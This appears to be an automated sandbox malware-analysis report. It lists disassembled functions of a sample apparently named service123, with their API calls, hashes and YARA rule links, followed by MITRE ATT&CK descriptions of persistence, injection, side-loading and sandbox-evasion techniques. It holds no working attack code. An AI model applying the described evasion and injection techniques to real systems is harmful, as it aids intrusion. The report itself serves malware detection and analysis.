API ID: wcslen$strlen
String ID:
API String ID: 1625065929-0
Opcode ID: 2c91a09400dc6aecd5331998cfcffc531a808b9a8588e993b124c6426ca1d6ed
Instruction ID: 460118eac5d9841cd5b6fd6ca78e8f884d56a3dd0f2426cb8f4542577cfe46f1
Opcode Fuzzy Hash: 2c91a09400dc6aecd5331998cfcffc531a808b9a8588e993b124c6426ca1d6ed
Instruction Fuzzy Hash: F1F14DB5A056068FC700DFADC4849AEBBF0FF44314B118A69E8A5CBB54E735E945CF82

Function 6C3D55D0 Relevance: 5.4, APIs: 4, Instructions: 369stringCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C3D560A
wcslen.MSVCRT ref: 6C3D569C
wcslen.MSVCRT ref: 6C3D572E
strlen.MSVCRT ref: 6C3D57C0

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: wcslen$strlen
String ID:
API String ID: 1625065929-0
Opcode ID: d791bc4c8f9383a8b3542bafc12e771909c8dc7e659fb4c6b96012f46284c2bc
Instruction ID: 6edad617acbb3919c5c9f144fe6f84c54144b20c06defd9ea6b3ac771658dcbe
Opcode Fuzzy Hash: d791bc4c8f9383a8b3542bafc12e771909c8dc7e659fb4c6b96012f46284c2bc
Instruction Fuzzy Hash: C7F14AB5A056058FC700DF6DC0849AEBBF0FF84324B528A69E895CBB54E735E946CF81

Function 6C353080 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C353101

Strings

NaN, xrefs: 6C353081

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: fputc
String ID: NaN
API String ID: 1992160199-1757892521
Opcode ID: 754b8ce3f8fa4690721228c4aee24319d66584de9428a45dc667d3d97db26e02
Instruction ID: 8a0b42df0152fb74cc56857ecc3c9a5c303a96db89f89450c80db7e09bd7decd
Opcode Fuzzy Hash: 754b8ce3f8fa4690721228c4aee24319d66584de9428a45dc667d3d97db26e02
Instruction Fuzzy Hash: F54147B1A056148BCB40DF28C480B86B7E1AF85708BA9C299DC888F74AD336DD168F90

Function 000129B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 00012A31

Strings

NaN, xrefs: 000129B1

Memory Dump Source

Source File: 00000005.00000002.3307743651.0000000000011000.00000020.00000001.01000000.00000005.sdmp, Offset: 00010000, based on PE: true

Associated: 00000005.00000002.3307715899.0000000000010000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307770444.000000000001A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307796313.000000000001E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307816608.0000000000021000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000_service123.jbxd

Similarity

API ID: fputc
String ID: NaN
API String ID: 1992160199-1757892521
Opcode ID: 68ffc95d9e1d25a608f043cc23bf2ccf1fe7a9d213018a5cf932c0028062011a
Instruction ID: 5907479175cc3afc27a24e57ed62d58559646bf4a4790dd3c36665a2e884b8ee
Opcode Fuzzy Hash: 68ffc95d9e1d25a608f043cc23bf2ccf1fe7a9d213018a5cf932c0028062011a
Instruction Fuzzy Hash: 92411771A04215CBDB64DF1CC5C4796BBE5AF88710B69C2A9DC888F34AD332DD92CB91

Function 6C3D4DD0 Relevance: 5.4, APIs: 4, Instructions: 352stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C3D4E0A
strlen.MSVCRT ref: 6C3D4E8D
strlen.MSVCRT ref: 6C3D4F10
strlen.MSVCRT ref: 6C3D4F93

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 35a8e06a8c29a2b34c62cdda6f3435e87ae993ea5b90a06f3cac69480338eb4e
Instruction ID: a9b933972924156a3be50458c827e96da52b1342262ee6629df9ff88a653fd80
Opcode Fuzzy Hash: 35a8e06a8c29a2b34c62cdda6f3435e87ae993ea5b90a06f3cac69480338eb4e
Instruction Fuzzy Hash: 77E158B5A046058FCB00DF6DC1809AEBBF1FF44314B118A69E895CBB54E735E909CF91

Function 6C3D45D0 Relevance: 5.4, APIs: 4, Instructions: 352stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C3D460A
strlen.MSVCRT ref: 6C3D468D
strlen.MSVCRT ref: 6C3D4710
strlen.MSVCRT ref: 6C3D4793

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 573e8b32d8eb713c6f34cb79a6c03763e890c928d491f6da0c64b33a4701583e
Instruction ID: 3b008994ff8f8ee1115dfa34722bd2b3ab78d3d54137c04da93ba4ba14d6861b
Opcode Fuzzy Hash: 573e8b32d8eb713c6f34cb79a6c03763e890c928d491f6da0c64b33a4701583e
Instruction Fuzzy Hash: 3DE167B5A046058FC700DF6DC1C09AEBBF1BF85314B118A69E895DBB54EB31E909CF91

Function 6C35E1F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89stringCOMMON

Download Yara Rule

APIs

strerror.MSVCRT ref: 6C35E1FE
strlen.MSVCRT ref: 6C35E211

Strings

basic_string: construction from null is not valid, xrefs: 6C35E233

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: strerrorstrlen
String ID: basic_string: construction from null is not valid
API String ID: 960536887-2991274800
Opcode ID: 50d7902c61f286e9b3453ed751b33f4e0960b1147cf84ad174fce1f8b2232ccd
Instruction ID: 46218a17f0bad08c0a2b23404bc6520971b6788e093dba2b615e50814f7ea1cc
Opcode Fuzzy Hash: 50d7902c61f286e9b3453ed751b33f4e0960b1147cf84ad174fce1f8b2232ccd
Instruction Fuzzy Hash: 72110372A186108FC700FF7EC84585AB7F1AB89314F85CA69D89487708E639D4158FF3

Function 6C353616 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C353567
fputc.MSVCRT ref: 6C3535D7
memset.MSVCRT ref: 6C353692

Strings

o, xrefs: 6C35362E

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: o
API String ID: 2944404495-252678980
Opcode ID: 70f9009819c30ed6982fd80218ea7a036d91aa79bbb5e6e144e921cc07d2ecdd
Instruction ID: cd5a1268e3722b6c25a35b1d292365d50e22c4c72d53f6a67267a2aa59934562
Opcode Fuzzy Hash: 70f9009819c30ed6982fd80218ea7a036d91aa79bbb5e6e144e921cc07d2ecdd
Instruction Fuzzy Hash: DB31AB72A08305CFCB40CF68C180B99BBF1BF48344F958A29D989ABB05E735E925CF50

Function 00012F46 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 00012E97
fputc.MSVCRT ref: 00012F07
memset.MSVCRT ref: 00012FC2

Strings

o, xrefs: 00012F5E

Memory Dump Source

Source File: 00000005.00000002.3307743651.0000000000011000.00000020.00000001.01000000.00000005.sdmp, Offset: 00010000, based on PE: true

Associated: 00000005.00000002.3307715899.0000000000010000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307770444.000000000001A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307796313.000000000001E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307816608.0000000000021000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: o
API String ID: 2944404495-252678980
Opcode ID: d1991d27a04d65bd7075c62f110e734cf744bc34d9a2ff6285541d999189f403
Instruction ID: ccff9be86db32a3c7ecc508f4edb4d343d5c3ab92c96c1f693d1a3ba51ef03e4
Opcode Fuzzy Hash: d1991d27a04d65bd7075c62f110e734cf744bc34d9a2ff6285541d999189f403
Instruction Fuzzy Hash: 0E312872A04209CFCB51CF68C1947DABBF1BF58350F158669D989AB702E734ED94CB90

Function 6C353AF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C353A5F
fputc.MSVCRT ref: 6C353AC1

Strings

@, xrefs: 6C353AFA

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: fputc
String ID: @
API String ID: 1992160199-2766056989
Opcode ID: 4ceeb5be7b06ab83894e5669f94d5ac76a8e9207d24777a966ec28ddf3749335
Instruction ID: 98384b6b0aea93eefc4c4b3d3616f9248be21d1a6e07e4f160c8ccbdda2730cb
Opcode Fuzzy Hash: 4ceeb5be7b06ab83894e5669f94d5ac76a8e9207d24777a966ec28ddf3749335
Instruction Fuzzy Hash: 9A112EB9A052408BCB41CF28C180F89BBF1BF45308FA58659ED996FB4AD335E821CF55

Function 00013424 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 0001338F
fputc.MSVCRT ref: 000133F1

Strings

@, xrefs: 0001342A

Memory Dump Source

Source File: 00000005.00000002.3307743651.0000000000011000.00000020.00000001.01000000.00000005.sdmp, Offset: 00010000, based on PE: true

Associated: 00000005.00000002.3307715899.0000000000010000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307770444.000000000001A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307796313.000000000001E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307816608.0000000000021000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000_service123.jbxd

Similarity

API ID: fputc
String ID: @
API String ID: 1992160199-2766056989
Opcode ID: 0837171a8a86bca28f46350b1f324809a3657fdd6de56afd08bfd6ae8b32df6d
Instruction ID: 9e5626ace44f8385fbf9d7bbfaf034aa16df03f3a3dab014134fc3dbeb63de25
Opcode Fuzzy Hash: 0837171a8a86bca28f46350b1f324809a3657fdd6de56afd08bfd6ae8b32df6d
Instruction Fuzzy Hash: 65111CB1A042048BCB55CF28C1847DDBBE1BF49700F258559EDA99F24ADB34EF80CB58

Function 000118B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 0001191E

Strings

Unknown error, xrefs: 000118B2
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 000118FF

Memory Dump Source

Source File: 00000005.00000002.3307743651.0000000000011000.00000020.00000001.01000000.00000005.sdmp, Offset: 00010000, based on PE: true

Associated: 00000005.00000002.3307715899.0000000000010000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307770444.000000000001A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307796313.000000000001E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307816608.0000000000021000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000_service123.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: 5c0b833e2e1f9318a83fa0173960b938afb4b1f6f3014dfcff777e9378af7a07
Instruction ID: 781502721615835a809f02600a784d71b61de605a12a174fd56b4e94192058c1
Opcode Fuzzy Hash: 5c0b833e2e1f9318a83fa0173960b938afb4b1f6f3014dfcff777e9378af7a07
Instruction Fuzzy Hash: 6D01D670508B45DBD340AF15E48849ABFF1FF8A350F828C9CE5C846269CB36D9A8C743

Function 6C3677B1 Relevance: 5.1, APIs: 4, Instructions: 128stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C3677D3

Part of subcall function 6C3B4050: memcpy.MSVCRT(?,?,?,?,-00000001,?,?,6C3677E6), ref: 6C3B40B3

strlen.MSVCRT ref: 6C367844
strlen.MSVCRT ref: 6C3678B2
strlen.MSVCRT ref: 6C367926

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: strlen$memcpy
String ID:
API String ID: 3396830738-0
Opcode ID: 491b354d9590ca7710ffddee5b0b220460f5a2f52caa3e0b4f01a08d4f711259
Instruction ID: 078377b8d4d9b725ab8c91619866d1cd536a8710fba21a18ee167d38ef831dfa
Opcode Fuzzy Hash: 491b354d9590ca7710ffddee5b0b220460f5a2f52caa3e0b4f01a08d4f711259
Instruction Fuzzy Hash: CC51F7B4A05A108FDB01EF29C09865DFBF1BF46304F4585ADD8955FB64C775A809CF82

Function 6C358080 Relevance: 5.1, APIs: 4, Instructions: 53sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,00000002,?,6C3581A1), ref: 6C3580A7
InitializeCriticalSection.KERNEL32(?,?,00000002,?,6C3581A1), ref: 6C3580E4
InitializeCriticalSection.KERNEL32(?,?,?,00000002,?,6C3581A1), ref: 6C3580F0
EnterCriticalSection.KERNEL32(?,?,00000002,?,6C3581A1), ref: 6C358118

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: CriticalSection$Initialize$EnterSleep
String ID:
API String ID: 1117354567-0
Opcode ID: b24cf70cdfe6693db78bf03308631bcb80d21f7d56e2c6aaa1c09d1b8e73d501
Instruction ID: cdc74e2c02d245729cc9040e030b0dd6c00645b1fbd4c9fedd9a90facee78024
Opcode Fuzzy Hash: b24cf70cdfe6693db78bf03308631bcb80d21f7d56e2c6aaa1c09d1b8e73d501
Instruction Fuzzy Hash: 4A1116B16691008BDF00FB3A95869B97BF4AB16718F910926C551C7608D632D5A4CF93

Function 00016B60 Relevance: 5.1, APIs: 4, Instructions: 53sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,?,00016C81,?,?,?,?,?,?,00000000,00014F24), ref: 00016B87
InitializeCriticalSection.KERNEL32(?,?,?,?,00016C81,?,?,?,?,?,?,00000000,00014F24), ref: 00016BC4
InitializeCriticalSection.KERNEL32(?,?,?,?,?,00016C81,?,?,?,?,?,?,00000000,00014F24), ref: 00016BD0
EnterCriticalSection.KERNEL32(?,?,?,?,00016C81,?,?,?,?,?,?,00000000,00014F24), ref: 00016BF8

Memory Dump Source

Source File: 00000005.00000002.3307743651.0000000000011000.00000020.00000001.01000000.00000005.sdmp, Offset: 00010000, based on PE: true

Associated: 00000005.00000002.3307715899.0000000000010000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307770444.000000000001A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307796313.000000000001E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307816608.0000000000021000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000_service123.jbxd

Similarity

API ID: CriticalSection$Initialize$EnterSleep
String ID:
API String ID: 1117354567-0
Opcode ID: 51ea21bcd1c2d6785de5bd6415c5af538a713613ea9ec2b738513afc0e7b10e5
Instruction ID: fd7e9a47c08937d58067ba11168a2e4ef45dc5008739fe4dcf0ea28cd8fd7150
Opcode Fuzzy Hash: 51ea21bcd1c2d6785de5bd6415c5af538a713613ea9ec2b738513afc0e7b10e5
Instruction Fuzzy Hash: 731109B150C1408AEB60FB78EDC55EA76E4AB01304F95492AD882C7215E77AE8C4C797

Function 6C34AB50 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 6C34AB5E
TlsGetValue.KERNEL32 ref: 6C34AB85
GetLastError.KERNEL32 ref: 6C34AB8C
LeaveCriticalSection.KERNEL32 ref: 6C34ABAC

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: db9ae8b469cd7345aa0e5a20e95464c3404f1fbf9cc6ff1fdf2eb52b3e215203
Instruction ID: b635d3c3ff2efa0afc40662b2a86ae2c18d516c180f185dbc082728690dbb2d3
Opcode Fuzzy Hash: db9ae8b469cd7345aa0e5a20e95464c3404f1fbf9cc6ff1fdf2eb52b3e215203
Instruction Fuzzy Hash: 14F0AFB2A043018FDB00FF7AD8C991B7BB4EA55364B054678DD8447708E632E948CFA3

Function 00012000 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,000121D3,?,?,?,?,?,000117E8), ref: 0001200E
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,000121D3,?,?,?,?,?,000117E8), ref: 00012035
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,000121D3,?,?,?,?,?,000117E8), ref: 0001203C
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,000121D3,?,?,?,?,?,000117E8), ref: 0001205C

Memory Dump Source

Source File: 00000005.00000002.3307743651.0000000000011000.00000020.00000001.01000000.00000005.sdmp, Offset: 00010000, based on PE: true

Associated: 00000005.00000002.3307715899.0000000000010000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307770444.000000000001A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307796313.000000000001E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307816608.0000000000021000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000_service123.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: 59530b44a23f2a596e56cfbe2335d929d92463518a3ad0658eee95da2806af93
Instruction ID: d1dc9cdb43e402ffe3c590c256cb0d2ac130ba328c03afad339007ba1f9793b8
Opcode Fuzzy Hash: 59530b44a23f2a596e56cfbe2335d929d92463518a3ad0658eee95da2806af93
Instruction Fuzzy Hash: 50F0A4B59003409FEB11BF78E88459EBBA4EB48340F054528DE4887216D739EC56CBA2

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
